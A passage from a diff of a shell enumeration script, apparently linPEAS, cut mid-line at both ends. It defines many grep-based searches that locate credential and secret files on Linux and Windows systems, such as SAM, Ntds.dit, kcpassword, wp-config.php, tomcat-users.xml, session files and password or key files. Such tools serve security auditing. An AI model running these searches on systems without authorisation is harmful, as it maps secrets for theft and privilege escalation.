"^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "seeddms.*$" | sort | uniq | head -n 70) - PSTORAGE_DDCLIENT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KCPASSWORD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "kcpassword$" | sort | uniq | head -n 70) - PSTORAGE_SENTRY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) - PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "environments$" | sort | uniq | head -n 70) - PSTORAGE_CACTI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cacti$" | sort | uniq | head -n 70) - PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "roundcube$" | sort | uniq | head -n 70) - PSTORAGE_PASSBOLT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) - PSTORAGE_JETTY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) - PSTORAGE_WGET=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) - PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) - PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) - PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) - PSTORAGE_DATABASE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) - PSTORAGE_BACKUPS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "backup$|backups$" | sort | uniq | head -n 70) - PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + PSTORAGE_SYSTEMD=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/lib|^/run|^/var|^$GREPHOMESEARCH|^/systemd|^/snap|^/private|^/mnt|^/cdrom|^/etc|^/usr|^/tmp|^/.cache|^/srv|^/lib32|^/bin|^/applications|^/lib64|^/media|^/sys|^/opt|^/sbin|^/system" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/lib|^/run|^/var|^$GREPHOMESEARCH|^/systemd|^/snap|^/private|^/mnt|^/cdrom|^/etc|^/usr|^/tmp|^/.cache|^/srv|^/lib32|^/bin|^/applications|^/lib64|^/media|^/sys|^/opt|^/sbin|^/system" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/lib|^/run|^/var|^$GREPHOMESEARCH|^/systemd|^/snap|^/private|^/mnt|^/cdrom|^/etc|^/usr|^/tmp|^/.cache|^/srv|^/lib32|^/bin|^/applications|^/lib64|^/media|^/sys|^/opt|^/sbin|^/system" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "mysql$" | sort | uniq | head -n 70) + PSTORAGE_MARIADB=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SRV\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/mnt|^/private|^/tmp|^/var" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E '/default/settings.php' | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E 'moodle/config.php' | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E "^/.cache|^/mnt|^/cdrom|^/var|^/opt|^$GREPHOMESEARCH|^/sbin|^/srv|^/bin|^/etc|^/snap|^/applications|^/private|^/usr|^/media|^/tmp" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_APPLICATIONS\n$FIND_SBIN\n$FIND_LIB64\n$FIND_BIN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_MNT\n$FIND_SRV\n$FIND_USR\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_LIB32\n$FIND_LIB\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_OPT\n$FIND_CDROM\n$FIND_ETC\n$FIND_TMP\n$FIND_SYSTEMD\n$FIND_VAR\n$FIND_SNAP\n$FIND_MEDIA" | grep -E 